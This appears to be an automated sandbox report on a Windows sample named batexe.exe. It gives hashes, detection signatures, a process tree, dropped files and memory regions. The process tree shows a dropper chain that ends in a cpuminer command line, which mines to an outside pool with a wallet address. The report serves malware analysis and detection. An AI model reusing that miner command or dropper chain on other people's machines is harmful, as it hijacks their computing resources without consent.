Analysis

  • max time kernel
    296s
  • max time network
    303s
  • platform
    windows10-1703_x64
  • resource
    win10-20240214-ja
  • resource tags

    arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    19-02-2024 13:59

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4624
    • C:\Users\Admin\AppData\Local\Temp\2045.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\2045.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2045.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2320
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2556.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3260

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\2045.tmp\b2e.exe

    Filesize

    3.6MB

    MD5

    a202c43df284047b4026052f2015b382

    SHA1

    531129cc3cff7410080574b0fd1f8404c8c343d6

    SHA256

    22e0189ee48633fcbb780d8ce081c027adcfd289ce6b90e0dddf506b78a59a66

    SHA512

    03192f196ccd2100255c1fad56bd14019876f87509f7215f1af469e93a9e4a8686d7bd18a1273d46e05711d1017a87948b4299a6d4597fa66001b29ee310cea2

  • C:\Users\Admin\AppData\Local\Temp\2045.tmp\b2e.exe

    Filesize

    3.8MB

    MD5

    7a69624f7316e5fac68a079a6cf60a81

    SHA1

    447571efee607e9f5f76959049bd7c3ae6cf8c08

    SHA256

    b487f8fd1607ad1c71cd1e896f00c0b306f894bc2e0f8bff05496c9b670ed0ba

    SHA512

    0430154ea7c1c9d7aa479ae0bad090e15b009de546085b382b2fa6b4eb8ecc157a7405e56bffa1b860e2dccb7f11e9f7173d018e8b6483982baa3a135c741d93

  • C:\Users\Admin\AppData\Local\Temp\2556.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    847KB

    MD5

    c98f0bb4e5ce76eb954337fd41ca2202

    SHA1

    706b97b31e884b97e30789b99f1d3236b61eb7c9

    SHA256

    747a7981139a3f04a7d5f6c6999cb20d157fd674e0edb3378e67f2269f52f740

    SHA512

    4be8fb280746ad5120fc65978337f5d8b118717ec131b57b4bbad50ef3d5b183189cbb41f4a41d5c026acc77104f834d108c1221668db9c69d658fc4c4ee7007

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    930KB

    MD5

    e857aaa210d6c5fd7215430eb76e2082

    SHA1

    33147adc4145dc50a35022d9ae26c9602136754d

    SHA256

    8191ff8efa0e0e76b7381a8f8db85ba11bc27449116a4526a3805d240fdb60cc

    SHA512

    3b1eaae303936b2c9847abc5fc47dda035d39e500a5857cd9a130d0b3bb6b3be047aec474c79035576a5bbb9deff89ae75f5a9c6c5f160008c45c0eca98228fb

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    685KB

    MD5

    5d6a41bd18e75c8632eff67ba33ca36f

    SHA1

    d551ce8f0ca9e935ccb35241bdb5e723c84196e1

    SHA256

    91ed175595e1c848231662c4d13d1a39c1908b4c0b4de13bb6450b5486b4465c

    SHA512

    c71436b66c81f38f7eef8d99424780f5b6a01c8964ae6f5e8b9ea7fd131522ef48a00b09c323d798bfaf112ccf63550a93839352b79a6dee05509e37366c04f7

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    839KB

    MD5

    7cfe84ad90f6999473f632f107a7eab3

    SHA1

    eff4353d13dada4bce82ef40b4b72246b5b6e803

    SHA256

    b359f5cb1f0e9a814ab068e0960b6b32e6b9822fdb41f33c3c5e9d4c17f6a580

    SHA512

    a589656f67b6f3a9571edd073709cf037ed600fc3b7146b5d4edd5ccb8f363cc44049cc585707f6d5d54db2a7ea2c7244ec75e94856c6da4ca065986f532f10d

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    596KB

    MD5

    6199e6477abe9538a35473c25763a8d0

    SHA1

    7a04998b24d17d989cc049fe9f89d2f9868d665b

    SHA256

    fd82401a58e59b0c70faa135c3e5d8c6f7f334fcd27e903bfafae227a603f01d

    SHA512

    a035b30a6581f7002c91367e4a97217ed564e9ab336c0c9f404822da50ad13e86f5847891e4c8651464aa8266ff3035eb1d99aebb9de55d0adaa21c399753604

  • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    437KB

    MD5

    971d4146dd3c859b9f59ce4015b93945

    SHA1

    4a2fc5bae370ad1c2eaa21b6fa334ff440f8bc32

    SHA256

    3fc1c9dee11ad14ac0c49aedf51330132e2be987efd0acbdfbef12b5dd68122a

    SHA512

    c6dd3a390a0e9297228a535272857c236de188aa846c8a7a754d01c64f5e0857c135325f5cd6bfe155108463b980a6cbc69d42a7eb571bce51d6e64bd482fdeb

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    835KB

    MD5

    a5cf56b533e9f5085e8a7bc6cd815096

    SHA1

    4b9f6466f8a130a52cc14999f18fc00e6eb3bad6

    SHA256

    54342e027ff00845e7b957ccfb0f580c0054b7d11bd658eaec41a2935873025a

    SHA512

    f9e852e79f26e8b99305c4dba3d5f2bda6045c428fb7709ae4f8f52afeeeedbf0104de8f09475307d7118fa335ea0e65406f0ba4c81077ad9a4d17e04bc42119

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    455KB

    MD5

    f9218204ade240b8aa4b422bc46ab188

    SHA1

    52f4223e4137b67f198150acc7b8b0414306efb0

    SHA256

    838de060b51807797c729a7e623d6a1e093fcf5aa495bc458bd677e41f73448a

    SHA512

    6d4cb5e23484123163f205f181d3f07f1ebaaf27c8d7f370bfde8bd3d738a9503f127af0cdc6254db7cd07ac0e665f862812c62e82c8e7e29b5e95a612adaae5

  • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • memory/2320-50-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/2320-4-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3260-44-0x0000000001050000-0x0000000002905000-memory.dmp

    Filesize

    24.7MB

  • memory/3260-56-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3260-41-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/3260-43-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/3260-40-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3260-101-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3260-51-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3260-42-0x0000000050AE0000-0x0000000050B78000-memory.dmp

    Filesize

    608KB

  • memory/3260-61-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3260-66-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3260-71-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3260-76-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3260-91-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4624-5-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB